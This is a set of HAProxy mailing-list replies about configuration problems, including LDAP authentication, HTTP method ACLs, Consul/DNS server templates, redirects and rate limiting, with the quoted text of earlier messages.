> '(', ')' as arguments to http_auth_ldap. Do you have any hints for me on
> this topic?
> >
> > Feedback is very welcome!
>
>
> Hi, thanks for your patch.
>
> I already tried to add ldap authent in haproxy, but unfortunately the
> OpenLDAP library is only available in blocking mode. Unfortunately (again)
> OpenLDAP seems to be the only one lib LDAP available. So during the
> processing of the sample fetch “http_auth_ldap”, the following functions
> perform some network request and block HAProxy.
>
>  * ldap_initialize (maybe)
>  * ldap_simple_bind_s
>  * ldap_search_ext_s
>
> HAProxy is blocked waiting for LDAP response, so during this time HAProxy
> no longer process more HTTP requests. This behavior is not acceptable under
> heavy load.
>

​How about cases that have light load :-). I've been asking/waiting for
this feature for ​a long time and think it is (going to be ) a very
valuable addition to haproxy. Anyway, if you had experienced some issues
with the lib I wonder what is the way Apache and Nginx are doing it without
any performance impact? (or so we think?)

Maybe I would argue that as a feature it should be included in haproxy
anyway and be left to the users to opt for using it or not, with heavy
warning about possible performance impact.


> Two way for performing LDAP authent:
>
>  * easy: look for SPOE protocol. You just write a mulithread server which
> listent HAProxy for SPOE, perform LDAP request and return response. You
> will fond an example of a SPOE server in the contrib directory. I gueess
> that an SPOE contrib for LDAP authent will be welcome.
>
>  * difficult: make you own LDAP payload (very hard with v3 and crypto) and
> write a code for using socket like SPOE or Lua cosoket
>
> Best regards,
> Thierry
>
>
> >
> > Kind regards,
> >
> >   Danny
> > <0001-Simple-LDAP-authentication.patch>
>
>
> ​Cheers,
Igor​


Re: HTTP DELETE command failing

2017-11-02 Thread Igor Cicimov
On Fri, Nov 3, 2017 at 11:29 AM, Norman Branitsky <
norman.branit...@micropact.com> wrote:

> I have this included in the configuration:
>
> # Filter nasty input
>
> acl missing_cl hdr_cnt(Content-length) eq 0
>
> acl METH_PUT method PUT
>
> acl METH_GET method GET HEAD
>
> acl METH_PATCH method PATCH
>
> ##acl METH_DELETE method DELETE
>
> http-request deny if HTTP_URL_STAR !METH_OPTIONS || METH_POST
> missing_cl || METH_PUT missing_cl || METH_PATCH missing_cl
> ​​
> || METH_DELETE missing_cl
>
> http-request deny if METH_GET HTTP_CONTENT
>
> http-request deny unless METH_GET or METH_POST or METH_OPTIONS or
> METH_PATCH or METH_DELETE or METH_PUT
>
>
>
> My colleague commented out the METH_DELETE acl.
> It appears that in HAProxy 1.7 a number of acls are predefined
>
> and we could delete the METH_PUT, METH_GET, and METH_PATCH acls also.
> So is one of the http-request deny statements causing the problem?
>
>
> ​Maybe check the DELETE RFC
https://tools.ietf.org/html/rfc7231#section-4.3.5​

​and think about what to do with your conditions. Start by removing "​||
METH_DELETE missing_cl"
 from the first one.
​


Re: backend has no server available!

2017-11-13 Thread Igor Cicimov
On Mon, Nov 13, 2017 at 11:28 PM, James Stroehmann <
james.stroehm...@proquest.com> wrote:

> I had a similar problem, and I believe reducing my ‘hold valid’ setting to
> 1s fixed it.
>
>
>
>
>

​Possible explanation is the "inter" parameter which is by default set to
2s for the "check" operation, see
https://cbonte.github.io/haproxy-dconv/1.7/configuration.html#inter for
details.

In other words, read the docs about ALL timeouts set in Haproxy to figure
out how they correlate between each other and how to set the proper values
for your user case.​




> *From:* DHAVAL JAISWAL [mailto:dhava...@gmail.com]
> *Sent:* Monday, November 13, 2017 2:31 AM
> *To:* HAproxy Mailing Lists 
> *Subject:* backend has no server available!
>
>
>
> [External Email]
>
> I had the following config where we are using AWS ELB for load balancing.
> However, now we are keep getting backend test_cluster has no server
> available!
>
>
>
> Under this ELB two servers attached. Both instance are in healthy state.
> Healthy state we are checking on port 80 and tomcat response sending on
> port 8080
>
>
>
> internal-testtomcatautoscale-1314784611.ap-southeast-1.elb.amazonaws.com
>
>
>
>
>
> resolvers testresolver
>
>   nameserver dns1 169.254.169.253:53
>
>   resolve_retries   3
>
>   timeout retry 1s
>
>   hold valid   10s
>
>
>
> backend test_cluster
>
> mode http
>
> option forwardfor
>
> fullconn 1
>
> option httpchk /test-testalive
>
> http-check expect string OK
>
> option http-server-close
>
> option abortonclose
>
> balance roundrobin
>
> server server1 internal-testtomcatautoscale-1314784611.ap-southeast-1.elb.
> amazonaws.com:8080 check resolvers testresolver
>
>
>
>
>
> What could be the cause of this issue. How can i fix it.
>
>
>



-- 
Igor Cicimov | DevOps


p. +61 (0) 433 078 728
e. ig...@encompasscorporation.com <http://encompasscorporation.com/>
w*.* www.encompasscorporation.com
a. Level 4, 65 York Street, Sydney 2000


Re: backend has no server available!

2017-11-14 Thread Igor Cicimov
Dhaval,

What I put in my resolvers is the EC2 instance subnet dns server which for
EC2 is always the second IP of the subnet range, xxx.xxx.xxx..2

You can also find this IP in your /etc/resolv.conf on the haproxy
instances. Try replacing
​
169.254.169.253:53 with that value and see how you go.

On Wed, Nov 15, 2017 at 4:04 AM, DHAVAL JAISWAL  wrote:

> Even after reducing "hold valid"  to 1s shows the same behavior.
>
> One more observation is that after introducing ELB in haproxy config, site
> seems to have little late response.
>
> Provided link is helpful, however if any one face same issue or can share
> experience to solve it will be really helpful.
>
> On Tue, Nov 14, 2017 at 5:00 AM, Igor Cicimov  com> wrote:
>
>>
>>
>> On Mon, Nov 13, 2017 at 11:28 PM, James Stroehmann <
>> james.stroehm...@proquest.com> wrote:
>>
>>> I had a similar problem, and I believe reducing my ‘hold valid’ setting
>>> to 1s fixed it.
>>>
>>>
>>>
>>>
>>>
>>
>> ​Possible explanation is the "inter" parameter which is by default set to
>> 2s for the "check" operation, see https://cbonte.github.io/hapro
>> xy-dconv/1.7/configuration.html#inter for details.
>>
>> In other words, read the docs about ALL timeouts set in Haproxy to figure
>> out how they correlate between each other and how to set the proper values
>> for your user case.​
>>
>>
>>
>>
>>> *From:* DHAVAL JAISWAL [mailto:dhava...@gmail.com]
>>> *Sent:* Monday, November 13, 2017 2:31 AM
>>> *To:* HAproxy Mailing Lists 
>>> *Subject:* backend has no server available!
>>>
>>>
>>>
>>> [External Email]
>>>
>>> I had the following config where we are using AWS ELB for load
>>> balancing. However, now we are keep getting backend test_cluster has no
>>> server available!
>>>
>>>
>>>
>>> Under this ELB two servers attached. Both instance are in healthy state.
>>> Healthy state we are checking on port 80 and tomcat response sending on
>>> port 8080
>>>
>>>
>>>
>>> internal-testtomcatautoscale-1314784611.ap-southeast-1.elb.amazonaws.com
>>>
>>>
>>>
>>>
>>>
>>> resolvers testresolver
>>>
>>>   nameserver dns1 <http://169.254.169.253:53>
>>> ​​ <http://169.254.169.253:53>
>>> 169.254.169.253:53
>>>
>>>   resolve_retries   3
>>>
>>>   timeout retry 1s
>>>
>>>   hold valid   10s
>>>
>>>
>>>
>>> backend test_cluster
>>>
>>> mode http
>>>
>>> option forwardfor
>>>
>>> fullconn 1
>>>
>>> option httpchk /test-testalive
>>>
>>> http-check expect string OK
>>>
>>> option http-server-close
>>>
>>> option abortonclose
>>>
>>> balance roundrobin
>>>
>>> server server1 internal-testtomcatautoscale-1
>>> 314784611.ap-southeast-1.elb.amazonaws.com:8080 check resolvers
>>> testresolver
>>>
>>>
>>>
>>>
>>>
>>> What could be the cause of this issue. How can i fix it.
>>>
>>>
>>>
>>


Re: backend has no server available!

2017-11-15 Thread Igor Cicimov
Dhaval,

Looking again into your config, what is this:

  option httpchk /test-testalive

suppose to be testing? Looks like instead of testing the ELB as an endpoint
you are actually testing your application so the timeouts are comming from
your app and not the ELB. I would suggest you remove that option and let
HAP do a simple tcp check to health check the ELB and not your app.


On Wed, Nov 15, 2017 at 11:26 PM, DHAVAL JAISWAL  wrote:

> Some more information while showing backend not available.
>
> Server test_cluster/server1 is DOWN, reason: Layer7 timeout, check
> duration: 2001ms. 0 active and 0 backup servers left. 3 sessions active, 0
> requeued, 0 remaining in queue.
>  backend test_cluster has no server available!
>  Server test_cluster/server1 is DOWN, reason: Layer7 timeout, check
> duration: 2001ms. 0 active and 0 backup servers left. 1 sessions active, 0
> requeued, 0 remaining in queue.
>  backend test_cluster has no server available!
>  Server test_cluster server1 is UP, reason: Layer7 check passed, code:
> 200, info: "HTTP content check matched", check duration: 1ms. 1 active and
> 0 backup servers online. 0 sessions requeued, 0 total in queue.
>
>
>
>
> On Wed, Nov 15, 2017 at 5:20 PM, DHAVAL JAISWAL 
> wrote:
>
>> I did apply that and its under observation.
>>
>> There is one more issue after introducing Internal ELB is overall
>> performance of site is slightly reduced. The response which I used to get
>> in less than 100 ms now some time is going beyond 100 ms.
>>
>> Any clue how can I improve it.
>>
>> On Wed, Nov 15, 2017 at 4:21 AM, Igor Cicimov <
>> ig...@encompasscorporation.com> wrote:
>>
>>> Dhaval,
>>>
>>> What I put in my resolvers is the EC2 instance subnet dns server which
>>> for EC2 is always the second IP of the subnet range, xxx.xxx.xxx..2
>>>
>>> You can also find this IP in your /etc/resolv.conf on the haproxy
>>> instances. Try replacing
>>> ​
>>> 169.254.169.253:53 with that value and see how you go.
>>>
>>> On Wed, Nov 15, 2017 at 4:04 AM, DHAVAL JAISWAL 
>>> wrote:
>>>
>>>> Even after reducing "hold valid"  to 1s shows the same behavior.
>>>>
>>>> One more observation is that after introducing ELB in haproxy config,
>>>> site seems to have little late response.
>>>>
>>>> Provided link is helpful, however if any one face same issue or can
>>>> share experience to solve it will be really helpful.
>>>>
>>>> On Tue, Nov 14, 2017 at 5:00 AM, Igor Cicimov <
>>>> ig...@encompasscorporation.com> wrote:
>>>>
>>>>>
>>>>>
>>>>> On Mon, Nov 13, 2017 at 11:28 PM, James Stroehmann <
>>>>> james.stroehm...@proquest.com> wrote:
>>>>>
>>>>>> I had a similar problem, and I believe reducing my ‘hold valid’
>>>>>> setting to 1s fixed it.
>>>>>>
>>>>>>
>>>>>>
>>>>>>
>>>>>>
>>>>>
>>>>> ​Possible explanation is the "inter" parameter which is by default set
>>>>> to 2s for the "check" operation, see https://cbonte.github.io/hapro
>>>>> xy-dconv/1.7/configuration.html#inter for details.
>>>>>
>>>>> In other words, read the docs about ALL timeouts set in Haproxy to
>>>>> figure out how they correlate between each other and how to set the proper
>>>>> values for your user case.​
>>>>>
>>>>>
>>>>>
>>>>>
>>>>>> *From:* DHAVAL JAISWAL [mailto:dhava...@gmail.com]
>>>>>> *Sent:* Monday, November 13, 2017 2:31 AM
>>>>>> *To:* HAproxy Mailing Lists 
>>>>>> *Subject:* backend has no server available!
>>>>>>
>>>>>>
>>>>>>
>>>>>> [External Email]
>>>>>>
>>>>>> I had the following config where we are using AWS ELB for load
>>>>>> balancing. However, now we are keep getting backend test_cluster has no
>>>>>> server available!
>>>>>>
>>>>>>
>>>>>>
>>>>>> Under this ELB two servers attached. Both instance are in healthy
>>>>>> state. Healthy state we are checking on port 80 and tomcat response 
>>>>>> sending
>>>>>> on port 8080
>>>>>>
>>>>>>
>>>>>>
>>>>>> internal-testtomcatautoscale-1314784611.ap-southeast-1.elb.a
>>>>>> mazonaws.com
>>>>>>
>>>>>>
>>>>>>
>>>>>>
>>>>>>
>>>>>> resolvers testresolver
>>>>>>
>>>>>>   nameserver dns1 <http://169.254.169.253:53>
>>>>>> ​​ <http://169.254.169.253:53>
>>>>>> 169.254.169.253:53
>>>>>>
>>>>>>   resolve_retries   3
>>>>>>
>>>>>>   timeout retry 1s
>>>>>>
>>>>>>   hold valid   10s
>>>>>>
>>>>>>
>>>>>>
>>>>>> backend test_cluster
>>>>>>
>>>>>> mode http
>>>>>>
>>>>>> option forwardfor
>>>>>>
>>>>>> fullconn 1
>>>>>>
>>>>>> option httpchk /test-testalive
>>>>>>
>>>>>> http-check expect string OK
>>>>>>
>>>>>> option http-server-close
>>>>>>
>>>>>> option abortonclose
>>>>>>
>>>>>> balance roundrobin
>>>>>>
>>>>>> server server1 internal-testtomcatautoscale-1
>>>>>> 314784611.ap-southeast-1.elb.amazonaws.com:8080 check resolvers
>>>>>> testresolver
>>>>>>
>>>>>>
>>>>>>
>>>>>>
>>>>>>
>>>>>> What could be the cause of this issue. How can i fix it.
>>>>>>
>>>>>>
>>>>>>
>>>>>


Re: Change backend between a time frame

2017-11-17 Thread Igor Cicimov
On Sat, Nov 18, 2017 at 2:35 AM, GARET Julien 
wrote:

> Hello,
>
>
>
> I have a use case here where we want to be able to modify the backend
> between 8 pm et and 8 am, everyday. I was guessing that it would have
> something to do with an acl and the Date header. Do you think it would be
> possible ?
>
>
>
> We are using Haproxy 1.5.14 on CentOS 7.
>

​Upgrade to 1.6 and use:
https://cbonte.github.io/haproxy-dconv/1.6/management.html#9.2-set%20server

to update the backend with simple cronjob via stats soket. ​


Re: [ANNOUNCE] haproxy-1.8.0

2017-11-26 Thread Igor Cicimov
w
application servers occasionally returning a small object (favicon.ico,
main.css etc). While the obvious response is that installing a cache
there is the best idea, it is sometimes perceived as overkill for just
a few files. So what we've done here was to fill exactly that hole :
have a *safe*, maintenance-free, small objects cache. In practice, if
there is any doubt about a response's cachability, it will not cache.
Same if the response contains a Vary header or is larger than a buffer.
However this can bring huge benefits for situations where there's no
argument against trivial caching. The intent is to keep it as simple and
fast as possible so that it can always be faster than retrieving the
same
object from the next layer (possibly a full-featured cache). Note that I
purposely asked William *not* to implement the purge on the CLI so that
it remains maintenance-free and we don't see it abused where it should
not be installed.

This version brings a total of 1208 commits authored by 54 persons. That's
almost the double of the number of commits of 1.7 (706) for a bit less
people
(62 by then), though most of them are the same.

A few known limitations still apply to this release, but they are minor
enough to allow us to release and fix them later :
  - master-worker + daemon (-W -D) fails strangely on FreeBSD, and the
workaround is even stranger. Since the master-worker was meant to
replace
systemd-wrapper, it's not needed on this platform so we'll take care of
analysing the issue in depth. In the mean time, don't use -W on FreeBSD
(nor on OpenBSD given that the issue involved the kqueue poller).

  - the CLI's "show sess" command is known for not being 100% thread-safe,
so it's better to avoid using it if more than one thread is enabled.
Note
that it will not corrupt your system, it will most often work, but may
either report occasional garbage or immediately crash. If it completes
the dump you're safe. We'll work on it as well.

  - both the cache and HTTP compression use filters. It is not trivial to
safely use them both, we still need to sort this out and either
automatically deal with each corner case or document recommendations for
safe use. For now, please do not enable compression with the cache
(choose
only one of them). Note that neither is enabled by default so if you
don't
know, you're safe.

  - device detection engines currently don't support multi-threading (but
it's
safe to build with it, there is a runtime check).

The outstanding amount of new features above proves that the new development
model we've adopted last year works much better than what we had in the
past.
However I also noticed that it added a lot more pressure on a few person's
shoulders whose help has been invaluable in screening each and every report
so that the developers could stay focused on their tasks. And for this
reason,
among the 466 persons who participated to discussions over the last year and
those animating the Discourse forums, I'd like to address special thanks to
the following ones who together responded to the vast majority of the
threads
on the list, saving many of us from having to leave our code :
  - Aleksandar Lazic (aka Aleks)
  - Cyril Bonté
  - Daniel Schneller
  - Emmanuel Hocdet (aka Manu)
  - Igor Cicimov
  - Jarno Huuskonen
  - Pavlos Parissis
  - Thierry Fournier
  - Vincent Bernat

and a very special one for Lukas Tribus who in addition to providing a lot
of high quality answers on the mailing list has been tirelessly responding
to almost every question on Discourse, which is truly amazing (I'm starting
to suspect that there are several persons using the same name)! I'm totally
aware that saying "thank you" is not enough and that we'll definitely have
to see how to make your life easier as well guys, so that we can continue
to scale without adding you more burden!

I also noticed that the average quality of problem reports has significantly
increased over time, in part thanks to some long-time participants well used
to the process like Conrad Hoffmann, Pieter Baauw (aka PiBa-NL), Patrick
Hemmer, Dmitry Sivachenko or Jarno Huuskonen, and it's really great because
there's nothing more annoying than having to respond to a problem by always
starting to ask for the same information. So please keep up the good work
guys!

In my opinion we haven't emitted enough versions to make it easy for more
people to test, just like we haven't emitted enough stable releases, due to
all the people involved in the process being busy on their development. This
is something we'll have to address. I'll send a proposal of release schedule
for 1.9 some time later.

Now 1.9 opens with 1.9-dev0 so that we can go break things as usual :-)

Ple

Re: redirect question

2018-12-13 Thread Igor Cicimov
On Thu, Dec 13, 2018 at 10:18 PM Sevan Gelici  wrote:

> Hello,
>
> Could someone help me with a problem? I want to use haproxy but cannot get
> one part working. All traffic need to pass proxy but one folder needs to be
> mask ip only.
>
> I try to explain by examples
>
> So lets say
> proxy http://111.111.111.111:8000 everything what requests here  goes to
> orginal host. That i have but i want to exclude one location somehow but
> still i want it masked.
>
> http://111.111.111.111:8000/test/
>
> My configuration works fine but only this /test part is not going well.
>
>  global
> log /dev/log   local0
> chroot /var/lib/haproxy
> stats socket /run/haproxy/admin.sock mode 777 level admin
> stats timeout 30s
> user haproxy
> group haproxy
> daemon
>maxconn 1
>
> defaults
> log global
> mode http
> maxconn 1
> option httplog
> option logasap
> option forwardfor
> stats enable
> stats uri /haproxy?stats
> #Set the maximum allowed time to wait for a complete HTTP request
> timeout http-request 5s
> #Set the maximum time to wait for a connection attempt to a server
> to succeed.
> timeout connect 5s
> #Set the maximum inactivity time on the client side.
> timeout client 5s
> #Set the maximum inactivity time on the server side.
> timeout server 10s
>
> frontend http
> bind *:8080
>
> default_backend main
>  option forwardfor header X-Forwarded-For
> capture request header Host   len 32
> capture request header Referrer len 64
> capture request header User-Agent len 64
>
>
> backend main
>server main  111.111.111.1118080  check
>option http-buffer-request
> option forwardfor
>http-request set-header X-Forwarded-Port %[dst_port]
>


>http-request redirect location http://%[hdr(host)]/test/ code 301
> if { path /test }
>
>
This does not make much sense since you are creating infinite redirection
loop, virtually /test/ and /test are same path. What exactly did you want
to make out of this again? Not sure I understand what "masking" means?

>
> I think this part is not correct: http-request redirect location 
> http://%[hdr(host)]/test/
> code 301 if { path /test }
>
>
> I used also an another application called trafficserver but i want to use
> haproxy. In there documentation its this
>
>
> https://docs.trafficserver.apache.org/en/8.0.x/admin-guide/files/records.config.en.html
>
>
> number_of_redirections=0 | This setting determines the maximum number of
> times Trafficserver does a redirect follow location on receiving a 3XX
> Redirect response for a given client request.
>
> What can i do to get this option working on haproxy.
>
> Kind regards,
>
> Sevan Gelici
>
>


Using server-template for DNS resolution

2019-02-07 Thread Igor Cicimov
Hi,

I have a Jetty frontend exposed for couple of ActiveMQ servers behind SSL
terminating Haproxy-1.8.18. They share same storage and state via lock file
and there is only one active AMQ at any given time. I'm testing this now
with dynamic backend using Consul DNS resolution:

# dig +short @127.0.0.1 -p 8600 activemq.service.consul
10.140.4.122
10.140.3.171

# dig +short @127.0.0.1 -p 8600 _activemq._tcp.service.consul SRV
1 1 61616 ip-10-140-4-122.node.dc1.consul.
1 1 61616 ip-10-140-3-171.node.dc1.consul.

The backends status, the current "master":

root@ip-10-140-3-171:~/configuration-management# netstat -tuplen | grep java
tcp0  0 0.0.0.0:81610.0.0.0:*
LISTEN  5031374919617256/java
tcp0  0 0.0.0.0:6161   0.0.0.0:*
LISTEN  5031374919317256/java

and the "slave":

root@ip-10-140-4-122:~# netstat -tuplen | grep java

So the service ports are not available on the second one.

This is the relevant part of the HAP config that I think might be of
interest:

global
server-state-base /var/lib/haproxy
server-state-file hap_state

defaults
load-server-state-from-file global
default-server init-addrlast,libc,none

listen amq
bind ... ssl crt ...
mode http

option prefer-last-server

# when this is on the backend is down
#option tcp-check

default-server inter 10s downinter 5s rise 2 fall 2 slowstart 60s
maxconn 25 maxqueue 256 weight 100

# working but both show as up
server-template amqs 2 activemq.service.consul:8161 check

# working old static setup
#server ip-10-140-3-171 10.140.3.171:8161 check
#server ip-10-140-4-122 10.140.4.122:8161 check

This is working but the thing is I see both servers as UP in the HAP
console:
[image: amqs.png]
Is this normal for this kind of setup or I'm doing something wrong?

Another observation, when I have tcp check enabled like:

option tcp-check

the way I had it with the static lines like:

server ip-10-140-3-171 10.140.3.171:8161 check
server ip-10-140-4-122 10.140.4.122:8161 check

then both servers show as down.
Thanks in advance for any kind of input.
Igor


Re: Using server-template for DNS resolution

2019-02-07 Thread Igor Cicimov
On Fri, Feb 8, 2019 at 2:29 PM Igor Cicimov 
wrote:

> Hi,
>
> I have a Jetty frontend exposed for couple of ActiveMQ servers behind SSL
> terminating Haproxy-1.8.18. They share same storage and state via lock file
> and there is only one active AMQ at any given time. I'm testing this now
> with dynamic backend using Consul DNS resolution:
>
> # dig +short @127.0.0.1 -p 8600 activemq.service.consul
> 10.140.4.122
> 10.140.3.171
>
> # dig +short @127.0.0.1 -p 8600 _activemq._tcp.service.consul SRV
> 1 1 61616 ip-10-140-4-122.node.dc1.consul.
> 1 1 61616 ip-10-140-3-171.node.dc1.consul.
>
> The backends status, the current "master":
>
> root@ip-10-140-3-171:~/configuration-management# netstat -tuplen | grep
> java
> tcp0  0 0.0.0.0:81610.0.0.0:*
> LISTEN  5031374919617256/java
> tcp0  0 0.0.0.0:6161   0.0.0.0:*
> LISTEN  5031374919317256/java
>
> and the "slave":
>
> root@ip-10-140-4-122:~# netstat -tuplen | grep java
>
> So the service ports are not available on the second one.
>
> This is the relevant part of the HAP config that I think might be of
> interest:
>
> global
> server-state-base /var/lib/haproxy
> server-state-file hap_state
>
> defaults
> load-server-state-from-file global
> default-server init-addrlast,libc,none
>
> listen amq
> bind ... ssl crt ...
> mode http
>
> option prefer-last-server
>
> # when this is on the backend is down
> #option tcp-check
>
> default-server inter 10s downinter 5s rise 2 fall 2 slowstart 60s
> maxconn 25 maxqueue 256 weight 100
>
> # working but both show as up
> server-template amqs 2 activemq.service.consul:8161 check
>
> # working old static setup
> #server ip-10-140-3-171 10.140.3.171:8161 check
> #server ip-10-140-4-122 10.140.4.122:8161 check
>
> This is working but the thing is I see both servers as UP in the HAP
> console:
> [image: amqs.png]
> Is this normal for this kind of setup or I'm doing something wrong?
>
> Another observation, when I have tcp check enabled like:
>
> option tcp-check
>
> the way I had it with the static lines like:
>
> server ip-10-140-3-171 10.140.3.171:8161 check
> server ip-10-140-4-122 10.140.4.122:8161 check
>
> then both servers show as down.
> Thanks in advance for any kind of input.
> Igor
>
> Ok, the state has changed now, I have correct state on one haproxy:

[image: amqs_hap1.png]
but on the second the whole backend is down:

[image: amqs_hap2.png]
I confirmed via telnet that I can connect to port 8161 to the running amq
server from both haproxy servers.


Re: Using server-template for DNS resolution

2019-02-08 Thread Igor Cicimov
Hi Baptise,

On Fri, Feb 8, 2019 at 6:10 PM Baptiste  wrote:

>
>
> On Fri, Feb 8, 2019 at 6:09 AM Igor Cicimov <
> ig...@encompasscorporation.com> wrote:
>
>> On Fri, Feb 8, 2019 at 2:29 PM Igor Cicimov <
>> ig...@encompasscorporation.com> wrote:
>>
>>> Hi,
>>>
>>> I have a Jetty frontend exposed for couple of ActiveMQ servers behind
>>> SSL terminating Haproxy-1.8.18. They share same storage and state via lock
>>> file and there is only one active AMQ at any given time. I'm testing this
>>> now with dynamic backend using Consul DNS resolution:
>>>
>>> # dig +short @127.0.0.1 -p 8600 activemq.service.consul
>>> 10.140.4.122
>>> 10.140.3.171
>>>
>>> # dig +short @127.0.0.1 -p 8600 _activemq._tcp.service.consul SRV
>>> 1 1 61616 ip-10-140-4-122.node.dc1.consul.
>>> 1 1 61616 ip-10-140-3-171.node.dc1.consul.
>>>
>>> The backends status, the current "master":
>>>
>>> root@ip-10-140-3-171:~/configuration-management# netstat -tuplen | grep
>>> java
>>> tcp0  0 0.0.0.0:81610.0.0.0:*
>>> LISTEN  5031374919617256/java
>>> tcp0  0 0.0.0.0:6161   0.0.0.0:*
>>> LISTEN  5031374919317256/java
>>>
>>> and the "slave":
>>>
>>> root@ip-10-140-4-122:~# netstat -tuplen | grep java
>>>
>>> So the service ports are not available on the second one.
>>>
>>> This is the relevant part of the HAP config that I think might be of
>>> interest:
>>>
>>> global
>>> server-state-base /var/lib/haproxy
>>> server-state-file hap_state
>>>
>>> defaults
>>> load-server-state-from-file global
>>> default-server init-addrlast,libc,none
>>>
>>> listen amq
>>> bind ... ssl crt ...
>>> mode http
>>>
>>> option prefer-last-server
>>>
>>> # when this is on the backend is down
>>> #option tcp-check
>>>
>>> default-server inter 10s downinter 5s rise 2 fall 2 slowstart 60s
>>> maxconn 25 maxqueue 256 weight 100
>>>
>>> # working but both show as up
>>> server-template amqs 2 activemq.service.consul:8161 check
>>>
>>> # working old static setup
>>> #server ip-10-140-3-171 10.140.3.171:8161 check
>>> #server ip-10-140-4-122 10.140.4.122:8161 check
>>>
>>> This is working but the thing is I see both servers as UP in the HAP
>>> console:
>>> [image: amqs.png]
>>> Is this normal for this kind of setup or I'm doing something wrong?
>>>
>>> Another observation, when I have tcp check enabled like:
>>>
>>> option tcp-check
>>>
>>> the way I had it with the static lines like:
>>>
>>> server ip-10-140-3-171 10.140.3.171:8161 check
>>> server ip-10-140-4-122 10.140.4.122:8161 check
>>>
>>> then both servers show as down.
>>> Thanks in advance for any kind of input.
>>> Igor
>>>
>>> Ok, the state has changed now, I have correct state on one haproxy:
>>
>> [image: amqs_hap1.png]
>> but on the second the whole backend is down:
>>
>> [image: amqs_hap2.png]
>> I confirmed via telnet that I can connect to port 8161 to the running amq
>> server from both haproxy servers.
>>
>>
>
>
> Hi Igor,
>
> You're using the libc resolver function at startup time to resolve your
> backend, this is not recommended integration with Consul.
>  You will find some good explanations in this blog article:
>
> https://www.haproxy.com/fr/blog/haproxy-and-consul-with-dns-for-service-discovery/
>
> Basically, you should first create a "resolvers" section, in order to
> allow HAProxy to perform DNS resolution at runtime too.
>
> resolvers consul
>   nameserver consul 127.0.0.1:8600
>   accepted_payload_size 8192
>
> Then, you need to adjust your server-template line, like this:
> server-template amqs 10 _activemq._tcp.service.consul resolvers consul
> resolve-prefer ipv4 check
>
> In the example above, I am using on purpose the SRV records, because
> HAProxy supports it and it will use all information available in the
> response to update server's IP, weight and port.
>
> I hope this will help you.
>
> Baptiste
>

All sorted now. For the record and those interested here is my setup:

Haproxy:

Re: Anyone heard about DPDK?

2019-02-10 Thread Igor Cicimov
On Mon, 11 Feb 2019 1:49 am Bruno Henc  Hi,
>
>
> Another good explanation on what DPDK does is available here:
>
>
> https://learning.oreilly.com/videos/oscon-2017/9781491976227/9781491976227-video306685
>
> https://wiki.fd.io/images/1/1d/40_Gbps_IPsec_on_commodity_hardware.pdf
>
>
>
> On 2/10/19 12:21 PM, Aleksandar Lazic wrote:
> > Am 10.02.2019 um 12:06 schrieb Lukas Tribus:
> >> On Sun, 10 Feb 2019 at 10:48, Aleksandar Lazic 
> wrote:
> >>> Hi.
> >>>
> >>> I have seen this in some twitter posts and asked me if it's something
> useable for a Loadbalancer like HAProxy ?
> >>>
> >>> https://www.dpdk.org/
> >>>
> >>> To be honest it looks like a virtual NIC, but I'm not sure.
> >> See:
> >> https://www.mail-archive.com/haproxy@formilux.org/msg26748.html
> > 8-O Sorry I have forgotten that Question.
> > Sorry the noise and thanks for your patience.
> >
> >> lukas
> > Greetings
> > Aleks
> >
>

Acording to this:

DPDK allows the host to process packets faster by bypassing the Linux
kernel. Instead, interactions with the NIC are performed using drivers and
the DPDK libraries.

It might help network performance. Source
https://docs.paloaltonetworks.com/vm-series/8-0/vm-series-deployment/set-up-the-vm-series-firewall-on-kvm/performance-tuning-of-the-vm-series-for-kvm/integrate-open-vswitch-with-dpdk.html

It is discussed in context of KVM and OvS so not sure if useful in other
cases.

>


Re: Tune HAProxy in front of a large k8s cluster

2019-02-19 Thread Igor Cicimov
On Wed, 20 Feb 2019 3:39 am Joao Morais  Hi Willy,
>
> > Em 19 de fev de 2019, à(s) 01:55, Willy Tarreau  escreveu:
> >
> > use_backend foo if { var(req.host) ssl:www.example.com }
> >
> This is a nice trick that I’m planning to use with dynamic use_backend. I
> need to concat host (sometimes ssl_fc_sni) and path. The question is: how
> do I concatenate two strings?


Something like this:

> http-request set-header X-Concat %[req.fhdr(Authorization),word(3,.)]_%[src]



Apparently there isn’t a concat converter and http-request set-var()
> doesn’t support custom-log like expressions. There is a usecase where I
> need to concatenate ssl_fc_sni and path before search in the map.
>
>
> > At this point I think that such heavy configs reach their limits and
> > that the only right solution is the dynamic use_backend (possibly with
> > a map).
> >
> Thanks for the detailed review! I’m going to the map route.
>
>
> >> There are also a lot of other backends and
> >> servers with health check enabled every 2s consuming some cpu and
> network.
> >
> > For this if you have many times the same server you can use the "track"
> > directive, and only enable checks on a subset of servers and have all
> > other track them. Typically you'd have a dummy backend dedicated to
> > checks, and checks disabled in all other backends, replaced with track.
> >
> I’d say that currently about 98% are unique servers, but this is indeed a
> nice implementation to the configuration builder.
>
>
> >> Note also that I needed to add -no-pie otherwise gprof output was empty
> --
> >> sounds a gcc issue. Let me know if this is good enough.
> >
> > Yes that's fine and the output was perfectly exploitable.
> >
> Great!
>
> One final note - sorry about the flood yesterday. I can say with about 90%
> sure I sent only one message =)
>
> ~jm
>
>
>


Re: How to allow Client Requests at a given rate

2019-02-23 Thread Igor Cicimov
On Sat, 23 Feb 2019 3:09 pm Santos Das  wrote:

> Hi,
>
> I have a requirement where I need to allow only certain request rate for a
> given URL.
>
> Say /login can be accessed at the rate of 10 RPS. If I get 100 RPS, then
> 10 should be allowed and 90 should be denied.
>
> Any help on how this can be achieved ?
>
> *I tried to use the sticky table, but once it blocks it blocks for ever.
> Please advise.*
>
>
> frontend api_gateway
> bind 0.0.0.0:80 
> mode http
> option forwardfor
>
> default_backend nodes
>
>  # Set up stick table to track request rates
> stick-table type binary len 8 size 1m expire 10s store
> http_req_rate(10s)
>
> # Track client by base32+src (Host header + URL path + src IP)
> http-request track-sc0 base32+src
>
> # Check map file to get rate limit for path
> http-request set-var(req.rate_limit)
> path,map_beg(/etc/hapee-1.8/maps/rates.map)
>
> # Client's request rate is tracked
> http-request set-var(req.request_rate)
> base32+src,table_http_req_rate(api_gateway)
>
> # Subtract the current request rate from the limit
> # If less than zero, set rate_abuse to true
> acl rate_abuse var(req.rate_limit),sub(req.request_rate) lt 0
>

Shouldn't this be:
acl rate_abuse var(req.rate_limit),sub(var(req.request_rate)) lt 0


> # Deny if rate abuse
> http-request deny deny_status 429 if rate_abuse
>
> backend nodes
> mode http
> balance roundrobin
> server echoprgm 10.37.9.30:11001 check
>
>
>
>


Re: global maxconn behaviour in haproxy2.0

2019-06-25 Thread Igor Cicimov
Hi,

